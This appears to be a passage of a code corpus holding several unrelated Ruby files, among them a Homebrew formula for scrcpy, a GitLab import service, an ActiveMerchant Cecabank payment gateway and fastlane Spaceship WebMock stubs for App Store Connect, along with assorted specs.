bottle do
sha256 arm64_big_sur: "0fd6c2d4d56cdbc09df21e7a8aabbeaa75a7658f99eb8478bdfd6b97d510dad6"
sha256 big_sur: "6c960c8555c710cd1058e256b34e6c93be8b3294a6b34bbc58ead2344d6da740"
sha256 catalina: "c6262834293a4667e870ec7977e90fe1b5dda59d646555f9c71435195ac4a970"
sha256 mojave: "1c5e721c141ecb90418ccf5500756c94bf48c2dc1ead190e6cc16024b5449430"
end
depends_on "meson" => :build
depends_on "ninja" => :build
depends_on "pkg-config" => :build
depends_on "ffmpeg"
depends_on "sdl2"
resource "prebuilt-server" do
url "https://github.com/Genymobile/scrcpy/releases/download/v1.18/scrcpy-server-v1.18"
sha256 "641c5c6beda9399dfae72d116f5ff43b5ed1059d871c9ebc3f47610fd33c51a3"
end
def install
r = resource("prebuilt-server")
r.fetch
cp r.cached_download, buildpath/"prebuilt-server.jar"
mkdir "build" do
system "meson", *std_meson_args,
"-Dprebuilt_server=#{buildpath}/prebuilt-server.jar",
".."
system "ninja", "install"
end
end
def caveats
<<~EOS
At runtime, adb must be accessible from your PATH.
You can install adb from Homebrew Cask:
brew install --cask android-platform-tools
EOS
end
test do
fakeadb = (testpath/"fakeadb.sh")
# When running, scrcpy calls adb three times:
# - adb push ... (to push scrcpy-server.jar)
# - adb reverse ... tcp:PORT ...
# - adb shell ...
# However, exiting on $1 = shell didn't work properly, so instead
# fakeadb exits on $1 = reverse
fakeadb.write <<~EOS
#!/bin/sh
echo $@ >> #{testpath/"fakeadb.log"}
if [ "$1" = "reverse" ]; then
exit 42
fi
EOS
fakeadb.chmod 0755
ENV["ADB"] = fakeadb
# It's expected to fail after adb reverse step because fakeadb exits
# with code 42
out = shell_output("#{bin}/scrcpy -p 1337 2>&1", 1)
assert_match(/ 42/, out)
log_content = File.read(testpath/"fakeadb.log")
# Check that it used port we've specified
assert_match(/tcp:1337/, log_content)
# Check that it tried to push something from its prefix
assert_match(/push #{prefix}/, log_content)
end
end
| 29.576471 | 92 | 0.678202 |
1d33b420cc13744c1307f9216ce1021f4ca80b17 | 513 | cask "qownnotes" do
version "20.10.5"
sha256 "f1e8a22a4b911e053b285980500fe705ddd5accc897d2b6489f169b1849cadfa"
# github.com/pbek/QOwnNotes/ was verified as official when first introduced to the cask
url "https://github.com/pbek/QOwnNotes/releases/download/v#{version}/QOwnNotes.dmg"
appcast "https://www.qownnotes.org/api/v1/last_release/QOwnNotes/macosx.json"
name "QOwnNotes"
homepage "https://www.qownnotes.org/"
auto_updates true
depends_on macos: ">= :sierra"
app "QOwnNotes.app"
end
| 32.0625 | 89 | 0.766082 |
1c5a549feb9cec77ca766d4cf3a92afab83e3f82 | 1,867 | module Projects
class ImportService < BaseService
include Gitlab::ShellAdapter
Error = Class.new(StandardError)
def execute
add_repository_to_project unless project.gitlab_project_import?
import_data
success
rescue => e
error(e.message)
end
private
def add_repository_to_project
if unknown_url?
# In this case, we only want to import issues, not a repository.
create_repository
elsif !project.repository_exists?
import_repository
end
end
def create_repository
unless project.create_repository
raise Error, 'The repository could not be created.'
end
end
def import_repository
begin
gitlab_shell.import_repository(project.repository_storage_path, project.path_with_namespace, project.import_url)
rescue => e
# Expire cache to prevent scenarios such as:
# 1. First import failed, but the repo was imported successfully, so +exists?+ returns true
# 2. Retried import, repo is broken or not imported but +exists?+ still returns true
project.repository.before_import if project.repository_exists?
raise Error, "Error importing repository #{project.import_url} into #{project.path_with_namespace} - #{e.message}"
end
end
def import_data
return unless has_importer?
project.repository.before_import unless project.gitlab_project_import?
unless importer.execute
raise Error, 'The remote data could not be imported.'
end
end
def has_importer?
Gitlab::ImportSources.importer_names.include?(project.import_type)
end
def importer
Gitlab::ImportSources.importer(project.import_type).new(project)
end
def unknown_url?
project.import_url == Project::UNKNOWN_IMPORT_URL
end
end
end
| 26.671429 | 123 | 0.695769 |
39d6d74388d13d4de1449ff05070b728e78bfc84 | 1,496 | # frozen_string_literal: true
require 'spec_helper'
def load_test_cases(filepath)
data = JSON.parse(File.open(filepath).read, symbolize_names: true)
environment = Flagsmith::Engine::Environment.build(data[:environment])
data[:identities_and_responses].map do |test_case|
identity = Flagsmith::Engine::Identity.build(test_case[:identity])
{
environment: environment,
identity: identity,
response: test_case[:response]
}
end
end
RSpec.describe Flagsmith::Engine::Core do
load_test_cases(
File.join(APP_ROOT, 'spec/engine-test-data/data/environment_n9fbf9h3v4fFgH3U3ngWhb.json')
).each do |test_case|
engine = Class.new { extend Flagsmith::Engine::Core }
json_flags = test_case.dig(:response, :flags).sort_by { |json| json.dig(:feature, :name) }
feature_states = engine.get_identity_feature_states(test_case[:environment], test_case[:identity]).sort_by { |fs| fs.feature.name }
it { expect(feature_states.length).to eq(json_flags.length) }
json_flags.each.with_index do |json_flag, index|
describe "feature state with ID #{json_flag.dig(:feature, :id)}" do
subject { feature_states[index] }
context '#enabled?' do
it { expect(subject.enabled?).to eq(json_flag[:enabled]) }
end
context '#get_value' do
it {
expect(subject.get_value(test_case[:identity].django_id)).to eq(json_flag[:feature_state_value])
}
end
end
end
end
end
| 32.521739 | 135 | 0.688503 |
f7ece9b149c029f505bbb86aaeabbc195d345e34 | 262 | module Faker
class Friends < Base
class << self
def character
fetch('friends.characters')
end
def location
fetch('friends.locations')
end
def quote
fetch('friends.quotes')
end
end
end
end
| 14.555556 | 35 | 0.557252 |
3881a9da16c253bda797779f0916e0549f1a9f7c | 2,227 | # frozen_string_literal: true
# encoding: utf-8
require 'spec_helper'
describe Mongo::Auth::Aws::Request do
describe "#formatted_time" do
context "when time is provided and frozen" do
let(:original_time) { Time.at(1592399523).freeze }
let(:request) do
described_class.new(access_key_id: 'access_key_id',
secret_access_key: 'secret_access_key',
session_token: 'session_token',
host: 'host',
server_nonce: 'server_nonce',
time: original_time
)
end
it 'doesn\'t modify the time instance variable' do
expect { request.formatted_time }.to_not raise_error
end
it 'returns the correct formatted time' do
expect(request.formatted_time).to eq('20200617T131203Z')
end
end
context "when time is not provided" do
let(:request) do
described_class.new(access_key_id: 'access_key_id',
secret_access_key: 'secret_access_key',
session_token: 'session_token',
host: 'host',
server_nonce: 'server_nonce'
)
end
it 'doesn\'t raise an error on formatted_time' do
expect { request.formatted_time }.to_not raise_error
end
end
end
describe "#signature" do
context "when time is provided and frozen" do
let(:original_time) { Time.at(1592399523).freeze }
let(:request) do
described_class.new(access_key_id: 'access_key_id',
secret_access_key: 'secret_access_key',
session_token: 'session_token',
host: 'host',
server_nonce: 'server_nonce',
time: original_time
)
end
it 'doesn\'t raise error on signature' do
expect { request.signature }.to_not raise_error
end
end
context "when time is not provided" do
let(:request) do
described_class.new(access_key_id: 'access_key_id',
secret_access_key: 'secret_access_key',
session_token: 'session_token',
host: 'host',
server_nonce: 'server_nonce'
)
end
it 'doesn\'t raise error on signature' do
expect { request.signature }.to_not raise_error
end
end
end
end
| 27.8375 | 64 | 0.626403 |
ed54d0987aa4d4dc10d24ea61cc70fab1a1d3f3f | 9,226 | module ActiveMerchant #:nodoc:
module Billing #:nodoc:
class CecabankGateway < Gateway
self.test_url = 'https://tpv.ceca.es'
self.live_url = 'https://pgw.ceca.es'
self.supported_countries = ['ES']
self.supported_cardtypes = [:visa, :master, :american_express]
self.homepage_url = 'http://www.ceca.es/es/'
self.display_name = 'Cecabank'
self.default_currency = 'EUR'
self.money_format = :cents
#### CECA's MAGIC NUMBERS
CECA_NOTIFICATIONS_URL = 'NONE'
CECA_ENCRIPTION = 'SHA2'
CECA_DECIMALS = '2'
CECA_MODE = 'SSL'
CECA_UI_LESS_LANGUAGE = 'XML'
CECA_UI_LESS_LANGUAGE_REFUND = '1'
CECA_UI_LESS_REFUND_PAGE = 'anulacion_xml'
CECA_ACTION_REFUND = 'anulaciones/anularParcial' # use partial refund's URL to avoid time frame limitations and decision logic on client side
CECA_ACTION_PURCHASE = 'tpv/compra'
CECA_CURRENCIES_DICTIONARY = {'EUR' => 978, 'USD' => 840, 'GBP' => 826}
# Creates a new CecabankGateway
#
# The gateway requires four values for connection to be passed
# in the +options+ hash.
#
# ==== Options
#
# * <tt>:merchant_id</tt> -- Cecabank's merchant_id (REQUIRED)
# * <tt>:acquirer_bin</tt> -- Cecabank's acquirer_bin (REQUIRED)
# * <tt>:terminal_id</tt> -- Cecabank's terminal_id (REQUIRED)
# * <tt>:key</tt> -- Cecabank's cypher key (REQUIRED)
# * <tt>:test</tt> -- +true+ or +false+. If true, perform transactions against the test server.
# Otherwise, perform transactions against the production server.
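#
# ==== Example
#
# A minimal construction sketch; the credential values below are placeholders,
# not real Cecabank credentials:
#
#   gateway = ActiveMerchant::Billing::CecabankGateway.new(
#     merchant_id: '12345678',
#     acquirer_bin: '0000554000',
#     terminal_id: '00000003',
#     key: 'cypher_key'
#   )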
def initialize(options = {})
requires!(options, :merchant_id, :acquirer_bin, :terminal_id, :key)
super
end
# Perform a purchase, which is essentially an authorization and capture in a single operation.
#
# ==== Parameters
#
# * <tt>money</tt> -- The amount to be purchased as an Integer value in cents.
# * <tt>creditcard</tt> -- The CreditCard details for the transaction.
# * <tt>options</tt> -- A hash of optional parameters.
#
# ==== Options
#
# * <tt>:order_id</tt> -- order_id passed used purchase. (REQUIRED)
# * <tt>:currency</tt> -- currency. Supported: EUR, USD, GBP.
# * <tt>:description</tt> -- description to be passed to the gateway.
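#
# ==== Example
#
# A minimal usage sketch with placeholder values; +credit_card+ is assumed to
# be an ActiveMerchant::Billing::CreditCard and the amount is in cents:
#
#   response = gateway.purchase(1000, credit_card,
#                               order_id: '1234567890',
#                               currency: 'EUR',
#                               description: 'Test purchase')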
def purchase(money, creditcard, options = {})
requires!(options, :order_id)
post = {'Descripcion' => options[:description],
'Num_operacion' => options[:order_id],
'Idioma' => CECA_UI_LESS_LANGUAGE,
'Pago_soportado' => CECA_MODE,
'URL_OK' => CECA_NOTIFICATIONS_URL,
'URL_NOK' => CECA_NOTIFICATIONS_URL,
'Importe' => amount(money),
'TipoMoneda' => CECA_CURRENCIES_DICTIONARY[options[:currency] || currency(money)]}
add_creditcard(post, creditcard)
commit(CECA_ACTION_PURCHASE, post)
end
# Refund a transaction.
#
# This transaction indicates to the gateway that
# money should flow from the merchant to the customer.
#
# ==== Parameters
#
# * <tt>money</tt> -- The amount to be credited to the customer as an Integer value in cents.
# * <tt>identification</tt> -- The reference given from the gateway on purchase (reference, not operation).
# * <tt>options</tt> -- A hash of parameters.
def refund(money, identification, options = {})
reference, order_id = split_authorization(identification)
post = {'Referencia' => reference,
'Num_operacion' => order_id,
'Idioma' => CECA_UI_LESS_LANGUAGE_REFUND,
'Pagina' => CECA_UI_LESS_REFUND_PAGE,
'Importe' => amount(money),
'TipoMoneda' => CECA_CURRENCIES_DICTIONARY[options[:currency] || currency(money)]}
commit(CECA_ACTION_REFUND, post)
end
def supports_scrubbing
true
end
def scrub(transcript)
transcript.
gsub(%r((Authorization: Basic )\w+), '\1[FILTERED]').
gsub(%r((&?pan=)[^&]*)i, '\1[FILTERED]').
gsub(%r((&?cvv2=)[^&]*)i, '\1[FILTERED]')
end
private
def add_creditcard(post, creditcard)
post['PAN'] = creditcard.number
post['Caducidad'] = expdate(creditcard)
post['CVV2'] = creditcard.verification_value
post['Pago_elegido'] = CECA_MODE
end
def expdate(creditcard)
"#{format(creditcard.year, :four_digits)}#{format(creditcard.month, :two_digits)}"
end
def parse(body)
response = {}
root = REXML::Document.new(body).root
response[:success] = (root.attributes['valor'] == 'OK')
response[:date] = root.attributes['fecha']
response[:operation_number] = root.attributes['numeroOperacion']
response[:message] = root.attributes['valor']
if root.elements['OPERACION']
response[:operation_type] = root.elements['OPERACION'].attributes['tipo']
response[:amount] = root.elements['OPERACION/importe'].text.strip
end
response[:description] = root.elements['OPERACION/descripcion'].text if root.elements['OPERACION/descripcion']
response[:authorization_number] = root.elements['OPERACION/numeroAutorizacion'].text if root.elements['OPERACION/numeroAutorizacion']
response[:reference] = root.elements['OPERACION/referencia'].text if root.elements['OPERACION/referencia']
response[:pan] = root.elements['OPERACION/pan'].text if root.elements['OPERACION/pan']
if root.elements['ERROR']
response[:error_code] = root.elements['ERROR/codigo'].text
response[:error_message] = root.elements['ERROR/descripcion'].text
else
if root.elements['OPERACION'].attributes['numeroOperacion'] == '000'
response[:authorization] = root.elements['OPERACION/numeroAutorizacion'].text if root.elements['OPERACION/numeroAutorizacion']
else
response[:authorization] = root.attributes['numeroOperacion']
end
end
return response
rescue REXML::ParseException => e
response[:success] = false
response[:message] = 'Unable to parse the response.'
response[:error_message] = e.message
response
end
def commit(action, parameters)
parameters.merge!(
'Cifrado' => CECA_ENCRIPTION,
'Firma' => generate_signature(action, parameters),
'Exponente' => CECA_DECIMALS,
'MerchantID' => options[:merchant_id],
'AcquirerBIN' => options[:acquirer_bin],
'TerminalID' => options[:terminal_id]
)
url = (test? ? self.test_url : self.live_url) + "/tpvweb/#{action}.action"
xml = ssl_post("#{url}?", post_data(parameters))
response = parse(xml)
Response.new(
response[:success],
message_from(response),
response,
:test => test?,
:authorization => build_authorization(response),
:error_code => response[:error_code]
)
end
def message_from(response)
if response[:message] == 'ERROR' && response[:error_message]
response[:error_message]
elsif response[:error_message]
"#{response[:message]} #{response[:error_message]}"
else
response[:message]
end
end
def post_data(params)
return nil unless params
params.map do |key, value|
next if value.blank?
if value.is_a?(Hash)
h = {}
value.each do |k, v|
h["#{key}.#{k}"] = v unless v.blank?
end
post_data(h)
else
"#{key}=#{CGI.escape(value.to_s)}"
end
end.compact.join('&')
end
def build_authorization(response)
[response[:reference], response[:authorization]].join('|')
end
def split_authorization(authorization)
authorization.split('|')
end
def generate_signature(action, parameters)
signature_fields =
case action
when CECA_ACTION_REFUND
options[:key].to_s +
options[:merchant_id].to_s +
options[:acquirer_bin].to_s +
options[:terminal_id].to_s +
parameters['Num_operacion'].to_s +
parameters['Importe'].to_s +
parameters['TipoMoneda'].to_s +
CECA_DECIMALS +
parameters['Referencia'].to_s +
CECA_ENCRIPTION
else
options[:key].to_s +
options[:merchant_id].to_s +
options[:acquirer_bin].to_s +
options[:terminal_id].to_s +
parameters['Num_operacion'].to_s +
parameters['Importe'].to_s +
parameters['TipoMoneda'].to_s +
CECA_DECIMALS +
CECA_ENCRIPTION +
CECA_NOTIFICATIONS_URL +
CECA_NOTIFICATIONS_URL
end
Digest::SHA2.hexdigest(signature_fields)
end
end
end
end
| 37.052209 | 149 | 0.593323 |
91581fb9e33c10fe7e74002927a77681be7a7c61 | 45,200 | # rubocop:disable Metrics/ClassLength
class TunesStubbing
class << self
def itc_read_fixture_file(filename)
File.read(File.join('spaceship', 'spec', 'tunes', 'fixtures', filename))
end
# Necessary, as we're now running this in a different context
def stub_request(*args)
WebMock::API.stub_request(*args)
end
def itc_stub_login
# Retrieving the current login URL
itc_service_key_path = File.expand_path("~/Library/Caches/spaceship_itc_service_key.txt")
File.delete(itc_service_key_path) if File.exist?(itc_service_key_path)
stub_request(:get, 'https://appstoreconnect.apple.com/itc/static-resources/controllers/login_cntrl.js').
to_return(status: 200, body: itc_read_fixture_file('login_cntrl.js'))
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa").
to_return(status: 200, body: "")
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/wa").
to_return(status: 200, body: "")
stub_request(:get, "https://appstoreconnect.apple.com/olympus/v1/session").
to_return(status: 200, body: itc_read_fixture_file('olympus_session.json'))
stub_request(:get, "https://appstoreconnect.apple.com/olympus/v1/app/config?hostname=itunesconnect.apple.com").
to_return(status: 200, body: { authServiceKey: 'e0abc' }.to_json, headers: { 'Content-Type' => 'application/json' })
# Actual login
stub_request(:post, "https://idmsa.apple.com/appleauth/auth/signin").
with(body: { "accountName" => "[email protected]", "password" => "so_secret", "rememberMe" => true }.to_json).
to_return(status: 200, body: '{}', headers: { 'Set-Cookie' => "myacinfo=abcdef;" })
# Failed login attempts
stub_request(:post, "https://idmsa.apple.com/appleauth/auth/signin").
with(body: { "accountName" => "bad-username", "password" => "bad-password", "rememberMe" => true }.to_json).
to_return(status: 401, body: '{}', headers: { 'Set-Cookie' => 'session=invalid' })
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/v1/session/webSession").
with(body: "{\"contentProviderId\":\"5678\",\"dsId\":null}",
headers: { 'Accept' => '*/*', 'Accept-Encoding' => 'gzip;q=1.0,deflate;q=0.6,identity;q=0.3', 'Content-Type' => 'application/json' }).
to_return(status: 200, body: "", headers: {})
# 2FA: Request security code to trusted phone
[1, 2].each do |id|
stub_request(:put, "https://idmsa.apple.com/appleauth/auth/verify/phone").
with(body: "{\"phoneNumber\":{\"id\":#{id}},\"mode\":\"sms\"}").
to_return(status: 200, body: "", headers: {})
end
# 2FA: Submit security code from trusted phone for verification
[1, 2].each do |id|
stub_request(:post, "https://idmsa.apple.com/appleauth/auth/verify/phone/securitycode").
with(body: "{\"securityCode\":{\"code\":\"123\"},\"phoneNumber\":{\"id\":#{id}},\"mode\":\"sms\"}").
to_return(status: 200, body: "", headers: {})
end
# 2FA: Submit security code from trusted phone with voice for verification
stub_request(:post, "https://idmsa.apple.com/appleauth/auth/verify/phone/securitycode").
with(body: "{\"securityCode\":{\"code\":\"123\"},\"phoneNumber\":{\"id\":1},\"mode\":\"voice\"}").
to_return(status: 200, body: "", headers: {})
# 2FA: Submit security code from trusted device for verification
stub_request(:post, "https://idmsa.apple.com/appleauth/auth/verify/trusteddevice/securitycode").
with(body: "{\"securityCode\":{\"code\":\"123\"}}").
to_return(status: 200, body: "", headers: {})
# 2FA: Trust computer
stub_request(:get, "https://idmsa.apple.com/appleauth/auth/2sv/trust").
to_return(status: 200, body: "", headers: {})
end
def itc_stub_applications
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/manageyourapps/summary/v2").
to_return(status: 200, body: itc_read_fixture_file('app_summary.json'), headers: { 'Content-Type' => 'application/json' })
# Create Version stubbing
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/version/create/1013943394").
with(body: "{\"version\":\"0.1\"}").
to_return(status: 200, body: itc_read_fixture_file('create_version_success.json'), headers: { 'Content-Type' => 'application/json' })
# Create Application
# Pre-Fill request
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/create/v2/?platformString=ios").
to_return(status: 200, body: itc_read_fixture_file('create_application_prefill_request.json'), headers: { 'Content-Type' => 'application/json' })
# Actual success request
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/create/v2").
to_return(status: 200, body: itc_read_fixture_file('create_application_success.json'), headers: { 'Content-Type' => 'application/json' })
# Overview of application to get the versions
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/1013943394/overview").
to_return(status: 200, body: itc_read_fixture_file('app_overview.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/overview").
to_return(status: 200, body: itc_read_fixture_file('app_overview.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/1000000000/overview").
to_return(status: 200, body: itc_read_fixture_file('app_overview_stuckinprepare.json'), headers: { 'Content-Type' => 'application/json' })
# App Details
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/details").
to_return(status: 200, body: itc_read_fixture_file('app_details.json'), headers: { 'Content-Type' => 'application/json' })
# Versions History
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/stateHistory?platform=ios").
to_return(status: 200, body: itc_read_fixture_file('app_versions_history.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/versions/814624685/stateHistory?platform=ios").
to_return(status: 200, body: itc_read_fixture_file('app_version_states_history.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_ratings
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/reviews/summary").
to_return(status: 200, body: itc_read_fixture_file('ratings.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/reviews/summary?storefront=US").
to_return(status: 200, body: itc_read_fixture_file('ratings_US.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/reviews?index=0&sort=REVIEW_SORT_ORDER_MOST_RECENT&storefront=US").
to_return(status: 200, body: itc_read_fixture_file('review_by_storefront.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/reviews?index=0&sort=REVIEW_SORT_ORDER_MOST_RECENT&versionId=1").
to_return(status: 200, body: itc_read_fixture_file('review_by_version_id.json'), headers: { 'Content-Type' => 'application/json' })
end
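# Editorial usage sketch (not part of the original helpers): each itc_stub_* method only
# registers WebMock stubs, so a spec installs the ones it needs in a `before` block and
# then exercises the client; matching HTTP calls are answered from the fixture files.
# A minimal, self-contained illustration using plain Net::HTTP (real specs would go
# through the Spaceship client instead):
#
#   require 'net/http'
#   require 'json'
#
#   before { itc_stub_ratings }
#
#   it "answers the ratings summary from the fixture" do
#     uri = URI("https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/reviews/summary")
#     expect(JSON.parse(Net::HTTP.get(uri))).to be_a(Hash) # assumes ratings.json parses to a Hash
#   end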
def itc_stub_build_details
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/buildHistory?platform=ios").
to_return(status: 200, body: itc_read_fixture_file('build_history.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/trains/2.0.1/buildHistory?platform=ios").
to_return(status: 200, body: itc_read_fixture_file('build_history_for_train.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/trains/2.0.1/builds/4/details").
to_return(status: 200, body: itc_read_fixture_file('build_details.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_candidate_builds
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/versions/812106519/candidateBuilds").
to_return(status: 200, body: itc_read_fixture_file('candiate_builds.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_applications_first_create
# Create First Application
# Pre-Fill request
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/create/v2/?platformString=ios").
to_return(status: 200, body: itc_read_fixture_file('create_application_prefill_first_request.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_applications_broken_first_create
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/create/v2").
to_return(status: 200, body: itc_read_fixture_file('create_application_first_broken.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_broken_create
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/create/v2").
to_return(status: 200, body: itc_read_fixture_file('create_application_broken.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_broken_create_wildcard
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/create/v2").
to_return(status: 200, body: itc_read_fixture_file('create_application_wildcard_broken.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_versions
# Receiving app version
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/versions/813314674").
to_return(status: 200, body: itc_read_fixture_file('app_version.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/versions/113314675").
to_return(status: 200, body: itc_read_fixture_file('app_version.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/1000000000/platforms/ios/versions/800000000").
to_return(status: 200, body: itc_read_fixture_file('app_version.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_attachment
# Receiving app version with review attachment data
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/versions/813314674").
to_return(status: 200, body: itc_read_fixture_file('app_review_attachment.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_submissions
# Start app submission
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/versions/812106519/submit/summary").
to_return(status: 200, body: itc_read_fixture_file('app_submission/start_success.json'), headers: { 'Content-Type' => 'application/json' })
# Complete app submission
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/versions/812106519/submit/complete").
to_return(status: 200, body: itc_read_fixture_file('app_submission/complete_success.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_submissions_already_submitted
# Start app submission
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/versions/812106519/submit/summary").
to_return(status: 200, body: itc_read_fixture_file('app_submission/start_success.json'), headers: { 'Content-Type' => 'application/json' })
# Complete app submission
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/versions/812106519/submit/complete").
to_return(status: 200, body: itc_read_fixture_file('app_submission/complete_failed.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_app_submissions_invalid
# Start app submission
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/versions/812106519/submit/summary").
to_return(status: 200, body: itc_read_fixture_file('app_submission/start_failed.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_resolution_center
# Called from the specs to simulate invalid server responses
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/resolutionCenter?v=latest").
to_return(status: 200, body: itc_read_fixture_file('app_resolution_center.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/ios/resolutionCenter?v=latest").
to_return(status: 200, body: itc_read_fixture_file('app_resolution_center.json'), headers: { 'Content-Type' => 'application/json' })
end
def itc_stub_build_trains
%w(internal external).each do |type|
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/trains/?platform=ios&testingType=#{type}").
to_return(status: 200, body: itc_read_fixture_file('build_trains.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/trains/?platform=appletvos&testingType=#{type}").
to_return(status: 200, body: itc_read_fixture_file('build_trains.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/trains/?testingType=#{type}").
to_return(status: 200, body: itc_read_fixture_file('build_trains.json'), headers: { 'Content-Type' => 'application/json' })
# Update build trains
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/testingTypes/#{type}/trains/").
to_return(status: 200, body: itc_read_fixture_file('build_trains.json'), headers: { 'Content-Type' => 'application/json' })
end
end
def itc_stub_testers
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/pre/int").
to_return(status: 200, body: itc_read_fixture_file('testers/get_internal.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/users/pre/ext").
to_return(status: 200, body: itc_read_fixture_file('testers/get_external.json'), headers: { 'Content-Type' => 'application/json' })
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/user/internalTesters/898536088/").
to_return(status: 200, body: itc_read_fixture_file('testers/existing_internal_testers.json'), headers: { 'Content-Type' => 'application/json' })
# Creating new testers is stubbed in `testers_spec.rb`
end
def itc_stub_testflight
%w(appletvos ios).each do |type|
# Test information
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/#{type}/trains/1.0/builds/10/testInformation").
to_return(status: 200, body: itc_read_fixture_file("testflight_build_info_#{type}.json"), headers: { 'Content-Type' => 'application/json' })
# Reject review
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/#{type}/trains/1.0/builds/10/reject").
with(body: "{}").
to_return(status: 200, body: "{}", headers: { 'Content-Type' => 'application/json' })
# Submission
stub_request(:post, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/platforms/#{type}/trains/1.0/builds/10/review/submit").
to_return(status: 200, body: itc_read_fixture_file("testflight_submission_submit_#{type}.json"), headers: { 'Content-Type' => 'application/json' })
end
end
def itc_stub_resolution_center_valid
# Called from the specs to simulate valid server responses
stub_request(:get, "https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/apps/898536088/resolutionCenter?v=latest").
